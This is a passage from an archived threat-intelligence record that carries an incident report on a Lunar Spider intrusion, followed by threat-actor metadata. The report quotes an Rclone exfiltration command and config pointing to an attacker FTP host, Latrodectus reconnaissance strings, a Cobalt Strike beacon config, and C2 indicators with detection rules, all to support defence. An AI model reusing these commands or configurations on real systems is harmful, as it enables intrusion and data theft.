xkxp7pKhnkQxUokR2dl00qsRa6Hx0xvQ31jTD7EwUqj4RXWtHwELbZFbOoqCnXl8\r\nOne extra functionality observed from the Latrodectus malware was Command and Control communication using the\r\nBackconnect protocol. 
More specifically, connections from explorer.exe and dllhost.exe were performed toward two\r\ndifferent IP addresses. Additionally, these IPs have been categorized with moderate confidence as related to IcedID\r\nBackconnect, which commonly shares infrastructure with Latrodectus.\r\nConnections to the first IP started during the first day and then swapped to the second IP on the fifth day.\r\nAs previously mentioned, utilizing Backconnect, various tasks were performed, such as browsing the file\r\nsystem, reading files, and uploading malware on the infected hosts.\r\nBackconnect traffic showing file upload\r\nDescription | Domain | IP Address | Port | ORG | Country\r\nLatrodectus C2 | workspacin[.]cloud | 104.21.16.155 or 172.67.213.171 | 443 | CLOUDFLARENET | US\r\nLatrodectus C2 | illoskanawer[.]com | 173.255.204.62 | 443 | Akamai Connected Cloud | US\r\nLatrodectus C2 | grasmetral[.]com | 104.21.52.10 or 172.67.193.233 | 443 | CLOUDFLARENET | US\r\nLatrodectus C2 | jarkaairbo[.]com | 172.67.172.177 or 104.21.30.90 | 443 | CLOUDFLARENET | US\r\nLatrodectus C2 | scupolasta[.]store | 172.67.174.176 or 104.21.88.89 | 443 | CLOUDFLARENET | US\r\nLatrodectus MSI Second Stage | – | 91.194.11.64 | 443 | TANGRAM-CANADA-INC | CA\r\nBackconnect | – | 193.168.143.196 | 443 | Zergrush Srl | RO\r\nBackconnect | – | 185.93.221.12 | 443 | SHOCK-1 | RO\r\nBrute Ratel\r\nThe MSI file downloaded by the malicious JavaScript contained a Brute Ratel DLL (upfilles.dll) that started C2\r\ncommunication to a series of remote hosts. 
Of note is the use of the Tyk.io service, which we have covered in prior\r\nreports.\r\nDomain | IP Address | Port | ORG | Country\r\nanikvan[.]com | 95.164.68.73 | 443 | Pq Hosting Plus S.r.l. | DE\r\naltynbe[.]com | 138.124.183.215 | 443 | Pq Hosting Plus S.r.l. | US\r\nboriz400[.]com | 91.194.11.183 | 443 | TANGRAM-CANADA-INC | CA\r\nridiculous-breakpoint-gw[.]aws-use1[.]cloud-ara[.]tyk[.]io | 54.165.22.33 or 35.153.92.249 or 34.233.204.207 or 54.159.36.188 or 35.172.8.165 or 54.175.181.104 | 443 | AMAZON-AES | US\r\nuncertain-kitten-gw[.]aws-euc1[.]cloud-ara[.]tyk[.]io | 3.72.42.242 or 3.69.236.35 or 35.157.36.116 or 3.66.241.8 or 3.124.114.34 or 3.69.194.165 | 443 | AMAZON-02 | DE\r\nOn the fifth day, the threat actor deployed a second Brute Ratel badger, named wscadminui.dll, which communicated\r\nwith the following domains:\r\nDomain | IP Address | Port | ORG | Country\r\nerbolsan[.]com | 94.232.249.100 | 443 | Psb Hosting Ltd | NL\r\nerbolsan[.]com | 94.131.108.254 | 443 | Pq Hosting Plus S.r.l. | TR\r\nsamderat200[.]com | 94.232.249.108 | 443 | Psb Hosting Ltd | NL\r\nsamderat200[.]com | 45.150.65.85 | 443 | Pq Hosting Plus S.r.l. | US\r\ndauled[.]com | 195.123.225.161 | 443 | Green Floid LLC | BG\r\nkasymdev[.]com | 195.211.98.249 | 443 | Green Floid LLC | US\r\nkasym500[.]com | 195.123.225.251 | 443 | Green Floid LLC | BG\r\nLsassa\r\nLsassa.exe was .NET malware that was deployed on the fourth day. It attempted to communicate with its C2 server\r\nevery 250 seconds. Additionally, each POST request sent to the server contained the hostname of the infected workstation and the\r\nusername of the compromised user.\r\nDomain | IP Address | Port | Protocol | ORG | Country\r\ncloudmeri[.]com | 162.0.209.121 | 443 | HTTPS | NAMECHEAP-NET | US\r\nMetasploit\r\nThe psexec Metasploit module was utilized by the threat actor in order to perform lateral movement. 
During the\r\nanalysis of the Metasploit shellcode, it was identified that it utilized the IP 217.196.98.61 to perform C2\r\ncommunication.\r\nIP Address | Port | Protocol | ORG | Country\r\n217.196.98.61 | 4444 | TCP | Aeza International LTD | DE\r\nAlthough the Metasploit shellcode was executed, it was unable to establish a successful Command and Control\r\nconnection, and the server rejected the connection.\r\nCobalt Strike\r\nThe final Command and Control tool used was Cobalt Strike. In the C2 communication, both HTTPS and HTTP\r\ntraffic were detected:\r\nBeacon | Domain | IP Address | Port | Protocol | ORG | Country\r\nsys.dll | avtechupdate[.]com | 206.206.123.209 | 443 | HTTPS | Datacamp Limited | US\r\ncron801.dl_, system.dl_ | – | 45.129.199.214 | 80 or 8080 | HTTP | BlueVPS OU | EE\r\n– | – | 31.13.248.153 | 80 or 8080 | HTTP | ASNET | BG\r\nTo summarize the Command and Control activity and showcase its intensity over time, the following graphs were\r\nmade:\r\nBeaconing with Cobalt Strike\r\nBeaconing without Cobalt Strike\r\nExfiltration\r\nRclone\r\nFrom a Cobalt Strike beacon on a file share server, the threat actor dropped a data exfiltration toolkit in the\r\nProgramData directory. This included a VBScript launcher (start.vbs), batch automation script (run.bat), renamed\r\nRclone (sihosts.exe), and Rclone configuration file (rclone.conf). 
This toolkit automated the theft of sensitive data by\r\nsyncing it to threat actor-controlled cloud storage using the legitimate Rclone utility.\r\nContent of start.vbs\r\nContent of run.bat:\r\nC:\\programdata\\sihosts.exe copy \"E:\" ftp:REDACTED\\\u003cFile Share Server\u003e\\E -q --exclude \"*.{ai,bin,blf,bmp\r\nThe threat actor dropped the Rclone configuration file (rclone.conf) twice on the file share server in quick succession.\r\nThe first rclone.conf file creation occurred three minutes before the second one, with two executions occurring\r\nbetween them, hinting that there may have been a mistake in the first config file dropped by the threat actor. The first\r\nexecution had a syntax error in specifying the drive to exfiltrate files from (the threat actor added an extra colon to the\r\ndrive), and the second execution showed that the threat actor had initially dropped the config file with an incorrect\r\nusername in it.\r\nThe FTP traffic shows that the username used was J0eBidenAbrabdy1aS3ha2 when it should have been\r\nJ0eBidenAbrabdy1aS3ha2Yeami, which was the username found in the rclone.conf file on the infected device\r\n(the same password was used in both executions).\r\n[ftp]\r\ntype = ftp\r\nhost = 45.135.232.3\r\nuser = J0eBidenAbrabdy1aS3ha2Yeami\r\n#port = 21\r\npass = \u003cREDACTED PASSWORD\u003e\r\n#tls = false\r\nExfiltration activity took place over 9 hours and 46 minutes.\r\nImpact\r\nAs discussed in the Exfiltration section, on the twentieth day, the threat actor successfully performed data exfiltration.\r\nDespite that, no further final actions on objectives were performed until they were evicted from the network.\r\nTimeline\r\nDiamond Model\r\nIndicators\r\nAtomic\r\nRDP Client Name\r\nVPS2DAY-32220LE\r\nRclone configuration\r\nhost: 45.135.232.3\r\nuser: J0eBidenAbrabdy1aS3ha2Yeami\r\nuser: J0eBidenAbrabdy1aS3ha2\r\nLatrodectus Domains\r\nworkspacin[.]cloud\r\nilloskanawer[.]com\r\ngrasmetral[.]com\r\njarkaairbo[.]com\r\nscupolasta[.]store\r\nBackconnect IP Addresses\r\n185.93.221.12\r\n193.168.143.196\r\nLsassa Backdoor Domain\r\ncloudmeri[.]com\r\nLsassa Backdoor IP Addresses\r\n162.0.209.121\r\nBrute Ratel Domains\r\nanikvan[.]com\r\naltynbe[.]com\r\nboriz400[.]com\r\nridiculous-breakpoint-gw[.]aws-use1[.]cloud-ara[.]tyk[.]io\r\nuncertain-kitten-gw[.]aws-euc1[.]cloud-ara[.]tyk[.]io\r\nerbolsan[.]com\r\nsamderat200[.]com\r\ndauled[.]com\r\nkasymdev[.]com\r\nkasym500[.]com\r\nBrute Ratel IP Addresses\r\n95.164.68.73\r\n138.124.183.215\r\n91.194.11.183\r\n94.232.249.100\r\n94.131.108.254\r\n94.232.249.108\r\n45.150.65.85\r\n195.123.225.161\r\n195.211.98.249\r\n195.123.225.251\r\nMetasploit IP Addresses\r\n217.196.98.61\r\nCobalt Strike Domains\r\navtechupdate[.]com\r\nCobalt Strike IP Addresses\r\n206.206.123.209\r\n45.129.199.214\r\n31.13.248.153\r\nLatrodectus Configuration\r\nConfig:\r\n{\r\n \"Version\": \"1.3\",\r\n \"Direction\": \"4\",\r\n \"C2s\": [\r\n \"hxxps://workspacin[.]cloud/live/\",\r\n \"hxxps://illoskanawer[.]com/live/\"\r\n ],\r\n \"RC4\": \"xkxp7pKhnkQxUokR2dl00qsRa6Hx0xvQ31jTD7EwUqj4RXWtHwELbZFbOoqCnXl8\",\r\n \"GroupID\": \"2221766521\",\r\n 
\"CampaignID\": \"Electrol\"\r\n}\r\n \r\nDecrypted Strings:\r\n{\r\n\"pid\":\r\n\"%d\",\r\n\"proc\":\r\n\"%s\",\r\n\"subproc\": [\r\n]\r\n}\r\n\u0026desklinks=[\r\n*.*\r\n\"%s\"\r\n]\r\n\u0026proclist=[\r\n{\r\n\"pid\":\r\n\"%d\",\r\n\"proc\":\r\n\"%s\",\r\n\"subproc\": [\r\n]\r\n}\r\n/c ipconfig /all\r\nC:\\Windows\\System32\\cmd.exe\r\n/c systeminfo\r\nC:\\Windows\\System32\\cmd.exe\r\n/c nltest /domain_trusts\r\nC:\\Windows\\System32\\cmd.exe\r\n/c nltest /domain_trusts /all_trusts\r\nC:\\Windows\\System32\\cmd.exe\r\n/c net view /all /domain\r\nC:\\Windows\\System32\\cmd.exe\r\n/c net view /all\r\nC:\\Windows\\System32\\cmd.exe\r\n/c net group \"Domain Admins\" /domain\r\nC:\\Windows\\System32\\cmd.exe\r\n/Node:localhost /Namespace:\\\\root\\SecurityCenter2 Path AntiVirusProduct Get * /Format:List\r\nC:\\Windows\\System32\\wbem\\wmic.exe\r\n/c net config workstation\r\nC:\\Windows\\System32\\cmd.exe\r\n/c wmic.exe /node:localhost /namespace:\\\\root\\SecurityCenter2 path AntiVirusProduct Get DisplayName | f\r\nC:\\Windows\\System32\\cmd.exe\r\n/c whoami /groups\r\nC:\\Windows\\System32\\cmd.exe\r\n\u0026ipconfig=\r\n\u0026systeminfo=\r\n\u0026domain_trusts=\r\n\u0026domain_trusts_all=\r\n\u0026net_view_all_domain=\r\n\u0026net_view_all=\r\n\u0026net_group=\r\n\u0026wmic=\r\n\u0026net_config_ws=\r\n\u0026net_wmic_av=\r\n\u0026whoami_group=\r\nrunnung\r\nfront\r\n/files/\r\n%d\r\n%s%s\r\nfiles/bp.dat\r\n%s\\%d.dll\r\n%d.dat\r\n%s\\%s\r\ninit -zzzz=\"%s\\%s\"\r\nElectrol\r\nMozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)\r\nMozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)\r\nContent-Type: 
application/x-www-form-urlencoded\r\nPOST\r\nGET\r\nCLEARURL\r\nURLS\r\nCOMMAND\r\nERROR\r\nxkxp7pKhnkQxUokR2dl00qsRa6Hx0xvQ31jTD7EwUqj4RXWtHwELbZFbOoqCnXl8\r\ncounter=%d\u0026type=%d\u0026guid=%s\u0026os=%d\u0026arch=%d\u0026username=%s\u0026group=%lu\u0026ver=%d.%d\u0026up=%d\u0026direction=%s\r\ncounter=%d\u0026type=%d\u0026guid=%s\u0026os=%d\u0026arch=%d\u0026username=%s\u0026group=%lu\u0026ver=%d.%d\u0026up=%d\u0026direction=%s\r\ncounter=%d\u0026type=%d\u0026guid=%s\u0026os=%d\u0026arch=%d\u0026username=%s\u0026group=%lu\u0026ver=%d.%d\u0026up=%d\u0026direction=%s\r\nABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/\r\nhttps://workspacin.cloud/live/\r\nhttps://illoskanawer.com/live/\r\n%s%d.dll\r\n%s%d.exe\r\nMozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)\r\n\u003chtml\u003e\r\n\u003c!DOCTYPE\r\n\u0026mac=\r\n%02x\r\n:%02x\r\n;\r\n\u0026computername=%s\r\n\u0026domain=%s\r\nC:\\WINDOWS\\SYSTEM32\\rundll32.exe %s,%s\r\nC:\\WINDOWS\\SYSTEM32\\rundll32.exe %s\r\n12345\r\n\u0026stiller=\r\nCobalt Strike Beacon Configuration (system.dl_ | cron801.dl_)\r\nVersion: 4.6\r\nSocket: 80\r\nBeacon Type: HTTP\r\nMaxGetSize: 2105681\r\nURL: hxxp://45.129.199[.]214/vodeo/wg01ck01\r\nJitter: 49\r\nEncryption Key: MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCGcLYJG9miEP3Lp+FqQ74n9HNbqI/s4ZE5fg0PHR7voXFnSWg\r\nHttpPostUri: /vodeo/vid_wg01ck01\r\nUser Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704\r\nMalleableC2Instructions: Remove 4338 chars from the end, Remove 4183 chars from the beginning, NetBIOS\r\nHTTPGetClient: mask, header Accept: application/xml, text/html, application/xhtml+xml\r\nHTTPPostClient: mask, mask, header Accept: text/html, application/xhtml+xml, application/json\r\nHTTPGet_Verb: GET\r\nHTTPPost_Verb: POST\r\nspawnto_x64: 
%windir%\\sysnative\\gpupdate.exe\r\nspawnto_x86: %windir%\\syswow64\\gpupdate.exe\r\nProxy_Behavior: Use IE settings\r\nWatermark: 987654321\r\nJitter: 49\r\nProcessInject_MinAllocation: 19836\r\nProcessInject_AllocationMethod: NtMapViewOfSection\r\nComputed\r\nrustscan.exe\r\n9eaa8464110883a15115b68ffa1ecf7d\r\n5348970723b378c7cae35bb03d8736f8e5a9f0ac\r\n37471af00673af4080ee21bd248536147e450d2eff45e8701a95d1163a9d62fe\r\nlsassa.exe\r\n50abc42faa70062e20cd5e2a2e2b6633\r\n97d72c8bbcf367be6bd5e80021e3bd3232ac309a\r\n203eda879dbdb128259cd658b22c9c21c66cbcfa1e2f39879c73b4dafb84c592\r\nrun.bat\r\nc8ea31665553cbca19b22863eea6ca2c\r\nba99cd73b74c64d6b1257b7db99814d1dc7d76b1\r\n411dfb067a984a244ff0c41887d4a09fbbcd8d562550f5d32d58a6a6256bd7b2\r\nstart.vbs\r\n4b3e9c9e018659d1cf04daf82abe3b64\r\n333e1c5967a9a6c881c9573a3222bed6ada911c6\r\n1a8ebf914ebea34402eecbf0985f05ae413663708d2fcc842fc27057ac5ec4ed\r\nsys.dll\r\nad3c52316e0059c66bc1dd680cf9edad\r\n8dfa63c0bb611e18c8331ed5b89decf433ac394a\r\n100e03eb4e9dcdab6e06b2b26f800d47a21d338885f5dc1b42c56a32429c9168\r\nCobalt Strike\r\nsystem.dl_ or cron801.dl_\r\n495363b0262b62dfc38d7bfb7b5541aa\r\n2d92890374904b49d3c54314d02b952e1a714e99\r\n77eede38abdc740f000596e374b6842902653aeafb6c63011388ebb22ec13e28\r\nBruteRatel\r\nupfilles.dll\r\nccb6d3cb020f56758622911ddd2f1fcb\r\n4a013f752c2bf84ca37e418175e0d9b6f61f636d\r\nf4cb6b684ea097f867d406a978b3422bbf2ecfea39236bf3ab99340996b825de\r\nBruteRatel\r\nwscadminui.dll\r\nd7bd590b6c660716277383aa23cb0aa9\r\n38999890b3a2c743e0abea1122649082a5fa1281\r\n6c3b2490e99cd8397fb79d84a5638c1a0c4edb516a4b0047aa70b5811483db8f\r\nzero.exe\r\n91889658f1c8e1462f06f019b842f109\r\n33a6b39fbe8ec45afab14af88fd6fa8e96885bf1\r\n36bc32becf287402bf0e9c918de22d886a74c501a33aa08dcb9be2f222fa6e24\r\nc356468.exe\r\nA2B6479A69B51AE555F695B243E4FDA1\r\n23FFF588E3E5CC6678E1F77FAB9318D60F3AC55F\r\n8FB5034AEDF41F8C8C4C4022FDDE7DB3C70A5A7C7B5B4DEC7F6A57715C18A5BF\r\nDetections\r\nNetwork\r\nET MALWARE Windows dir Microsoft Windows DOS prompt command exit OUTBOUND\r\nET MALWARE Windows Microsoft Windows DOS prompt command Error not recognized\r\nET POLICY Observed MSI Download\r\nThreatFox IcedID botnet C2 traffic (ip:port - confidence level: 60%)\r\nThreatFox Unidentified 111 (Latrodectus) botnet C2 traffic (ip:port - confidence level: 75%)\r\nThreatFox botnet C2 traffic (domain - confidence level: 100%)\r\nET HUNTING ZIP file exfiltration over raw TCP\r\nET DROP Spamhaus DROP Listed Traffic Inbound group 5\r\nET SCAN Behavioral Unusual Port 445 traffic Potential Scan or Infection\r\nET HUNTING Terse Unencrypted Request for Google - Likely Connectivity Check\r\nSigma\r\nSearch rules on detection.fyi or sigmasearchengine.com\r\nDFIR Private Rules:\r\n67eb826d-7745-416c-9674-525ef0dc7610 : Launching VNC Interactive Session\r\ne652d235-b994-432e-b2f3-15a9cee381df : Domain Enumeration Using Netdom Query\r\nf8a8998f-dfe9-4942-812c-f4e591653ced : MS-Settings Shell Command Hijacking\r\n1f959fda-4c54-4dad-9bca-4a5a65529772 : MSI Payload Executing Suspicious DLL Through Rundll32\r\na566b9e8-0a5c-4128-b499-c7632915d5e2 : Suspicious Type Command Over Administrative Share\r\nc42e8603-0311-4e4e-8923-4c1e8be9d78d : Suspicious Computer Machine Password Reset\r\n1b8ad6a1-35c3-4400-9678-e7d3e3b0acfd : DNS data export using dnscmd.exe\r\nb326e9ad-0d9b-43bf-8bd0-9620839c6f6b : Veeam Backup Credential Theft Detection\r\nSigma 
Repo:\r\nd522eca2-2973-4391-a3e0-ef0374321dae : Abused Debug Privilege by Arbitrary Parent Processes\r\nd5601f8c-b26f-4ab0-9035-69e11a8d4ad2 : CobaltStrike Named Pipe\r\n85adeb13-4fc9-4e68-8a4a-c7cb2c336eb7 : CobaltStrike Named Pipe Patterns\r\n7b434893-c57d-4f41-908d-6a17bf1ae98f : Network Connection Initiated From Process Located In Potentially\r\n08249dc0-a28d-4555-8ba5-9255a198e08c : Outbound Network Connection Initiated By Script Interpreter\r\ned74fe75-7594-4b4b-ae38-e38e3fd2eb23 : Outbound RDP Connections Over Non-Standard Tools\r\n85b0b087-eddf-4a2b-b033-d771fa2b9775 : PowerShell Download and Execution Cradles\r\n3dfd06d2-eaf4-4532-9555-68aca59f57c4 : Process Execution From A Potentially Suspicious Folder\r\n8834e2f7-6b4b-4f09-8906-d2276470ee23 : PsExec/PAExec Escalation to LOCAL SYSTEM\r\n9a132afa-654e-11eb-ae93-0242ac130002 : PUA - AdFind Suspicious Execution\r\ndf55196f-f105-44d3-a675-e9dfb6cc2f2b : Renamed AdFind Execution\r\n5bb68627-3198-40ca-b458-49f973db8752 : Rundll32 Execution Without Parameters\r\n152f3630-77c1-4284-bcc0-4cc68ab2f6e7 : Shell Open Registry Keys Manipulation\r\n3b6ab547-8ec2-4991-b9d2-2b06702a48d7 : Suspicious PowerShell Download and Execute Pattern\r\n3c89a1e8-0fba-449e-8f1b-8409d6267ec8 : Suspicious Process Created Via Wmic.EXE\r\n5cc2cda8-f261-4d88-a2de-e9e193c86716 : Suspicious Processes Spawned by WinRM\r\ndcdbc940-0bff-46b2-95f3-2d73f848e33b : Suspicious Spool Service Child Process\r\n2617e7ed-adb7-40ba-b0f3-8f9945fe6c09 : Suspicious SYSTEM User Process Creation\r\n1277f594-a7d1-4f28-a2d3-73af5cbeab43 : Windows Shell/Scripting Application File Write to Suspicious Fol\r\nYara\r\nNew Rules:\r\nhttps://github.com/The-DFIR-Report/Yara-Rules/blob/main/28761/28761.yar\r\nSource: 
https://thedfirreport.com/2025/09/29/from-a-single-click-how-lunar-spider-enabled-a-near-two-month-intrusion/\r\nHashing algorithm Then it decrypted the intermediary Brute Ratel payload via an XOR decryption algorithm using the embedded key:\n21 79 3C 7A 39 5F 3E 24 54 4A 7A 35 6C 33 3E 32 5F 66 74 76 6D 59 3C 4D 00",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://thedfirreport.com/2025/09/29/from-a-single-click-how-lunar-spider-enabled-a-near-two-month-intrusion/"
	],
	"report_names": [
		"from-a-single-click-how-lunar-spider-enabled-a-near-two-month-intrusion"
	],
	"threat_actors": [
		{
			"id": "c2385aea-d30b-4dbc-844d-fef465cf3ea9",
			"created_at": "2023-01-06T13:46:38.916521Z",
			"updated_at": "2026-04-10T02:00:03.144667Z",
			"deleted_at": null,
			"main_name": "LUNAR SPIDER",
			"aliases": [
				"GOLD SWATHMORE"
			],
			"source_name": "MISPGALAXY:LUNAR SPIDER",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "9f101d9c-05ea-48b9-b6f1-168cd6d06d12",
			"created_at": "2023-01-06T13:46:39.396409Z",
			"updated_at": "2026-04-10T02:00:03.312816Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"CHROMIUM",
				"ControlX",
				"TAG-22",
				"BRONZE UNIVERSITY",
				"AQUATIC PANDA",
				"RedHotel",
				"Charcoal Typhoon",
				"Red Scylla",
				"Red Dev 10",
				"BountyGlad"
			],
			"source_name": "MISPGALAXY:Earth Lusca",
			"tools": [
				"RouterGod",
				"SprySOCKS",
				"ShadowPad",
				"POISONPLUG",
				"Barlaiy",
				"Spyder",
				"FunnySwitch"
			],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "a6814184-2133-4520-b7b3-63e6b7be2f64",
			"created_at": "2025-08-07T02:03:25.019385Z",
			"updated_at": "2026-04-10T02:00:03.859468Z",
			"deleted_at": null,
			"main_name": "GOLD VICTOR",
			"aliases": [
				"DEV-0832 ",
				"STAC5279 ",
				"Vanilla Tempest ",
				"Vice Society",
				"Vice Spider "
			],
			"source_name": "Secureworks:GOLD VICTOR",
			"tools": [
				"Advanced IP Scanner",
				"Advanced Port Scanner",
				"HelloKitty ransomware",
				"INC ransomware",
				"MEGAsync",
				"Neshta",
				"PAExec",
				"PolyVice ransomware",
				"PortStarter",
				"PsExec",
				"QuantumLocker ransomware",
				"Rhysida ransomware",
				"Supper",
				"SystemBC",
				"Zeppelin ransomware"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "7cfe3bc9-7a6c-4ee1-a635-5ea7b947147f",
			"created_at": "2024-06-19T02:03:08.122318Z",
			"updated_at": "2026-04-10T02:00:03.652418Z",
			"deleted_at": null,
			"main_name": "GOLD SWATHMORE",
			"aliases": [
				"Lunar Spider "
			],
			"source_name": "Secureworks:GOLD SWATHMORE",
			"tools": [
				"Cobalt Strike",
				"GlobeImposter",
				"Gozi",
				"Gozi Trojan",
				"IcedID",
				"Latrodectus",
				"TrickBot"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "475ea823-9e47-4098-b235-0900bc1a5362",
			"created_at": "2022-10-25T16:07:24.506596Z",
			"updated_at": "2026-04-10T02:00:05.015497Z",
			"deleted_at": null,
			"main_name": "Lunar Spider",
			"aliases": [
				"Gold SwathMore"
			],
			"source_name": "ETDA:Lunar Spider",
			"tools": [
				"BokBot",
				"IceID",
				"IcedID",
				"NeverQuest",
				"Vawtrak",
				"grabnew"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "84aa9dbe-e992-4dce-9d80-af3b2de058c0",
			"created_at": "2024-02-02T02:00:04.041676Z",
			"updated_at": "2026-04-10T02:00:03.537352Z",
			"deleted_at": null,
			"main_name": "Vanilla Tempest",
			"aliases": [
				"DEV-0832",
				"Vice Society"
			],
			"source_name": "MISPGALAXY:Vanilla Tempest",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "18a7b52d-a1cd-43a3-8982-7324e3e676b7",
			"created_at": "2025-08-07T02:03:24.688416Z",
			"updated_at": "2026-04-10T02:00:03.734754Z",
			"deleted_at": null,
			"main_name": "BRONZE UNIVERSITY",
			"aliases": [
				"Aquatic Panda",
				"Aquatic Panda ",
				"CHROMIUM",
				"CHROMIUM ",
				"Charcoal Typhoon",
				"Charcoal Typhoon ",
				"Earth Lusca",
				"Earth Lusca ",
				"FISHMONGER ",
				"Red Dev 10",
				"Red Dev 10 ",
				"Red Scylla",
				"Red Scylla ",
				"RedHotel",
				"RedHotel ",
				"Tag-22",
				"Tag-22 "
			],
			"source_name": "Secureworks:BRONZE UNIVERSITY",
			"tools": [
				"Cobalt Strike",
				"Fishmaster",
				"FunnySwitch",
				"Spyder",
				"njRAT"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "6abcc917-035c-4e9b-a53f-eaee636749c3",
			"created_at": "2022-10-25T16:07:23.565337Z",
			"updated_at": "2026-04-10T02:00:04.668393Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"Bronze University",
				"Charcoal Typhoon",
				"Chromium",
				"G1006",
				"Red Dev 10",
				"Red Scylla"
			],
			"source_name": "ETDA:Earth Lusca",
			"tools": [
				"Agentemis",
				"AntSword",
				"BIOPASS",
				"BIOPASS RAT",
				"BadPotato",
				"Behinder",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"Doraemon",
				"FRP",
				"Fast Reverse Proxy",
				"FunnySwitch",
				"HUC Port Banner Scanner",
				"KTLVdoor",
				"Mimikatz",
				"NBTscan",
				"POISONPLUG.SHADOW",
				"PipeMon",
				"RbDoor",
				"RibDoor",
				"RouterGod",
				"SAMRID",
				"ShadowPad Winnti",
				"SprySOCKS",
				"WinRAR",
				"Winnti",
				"XShellGhost",
				"cobeacon",
				"fscan",
				"lcx",
				"nbtscan"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "d53593c3-2819-4af3-bf16-0c39edc64920",
			"created_at": "2022-10-27T08:27:13.212301Z",
			"updated_at": "2026-04-10T02:00:05.272802Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"Earth Lusca",
				"TAG-22",
				"Charcoal Typhoon",
				"CHROMIUM",
				"ControlX"
			],
			"source_name": "MITRE:Earth Lusca",
			"tools": [
				"Mimikatz",
				"PowerSploit",
				"Tasklist",
				"certutil",
				"Cobalt Strike",
				"Winnti for Linux",
				"Nltest",
				"NBTscan",
				"ShadowPad"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775439148,
	"ts_updated_at": 1775826723,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/f0163a40d10de6ebe7169543e45e67af2d6a621f.pdf",
		"text": "https://archive.orkl.eu/f0163a40d10de6ebe7169543e45e67af2d6a621f.txt",
		"img": "https://archive.orkl.eu/f0163a40d10de6ebe7169543e45e67af2d6a621f.jpg"
	}
}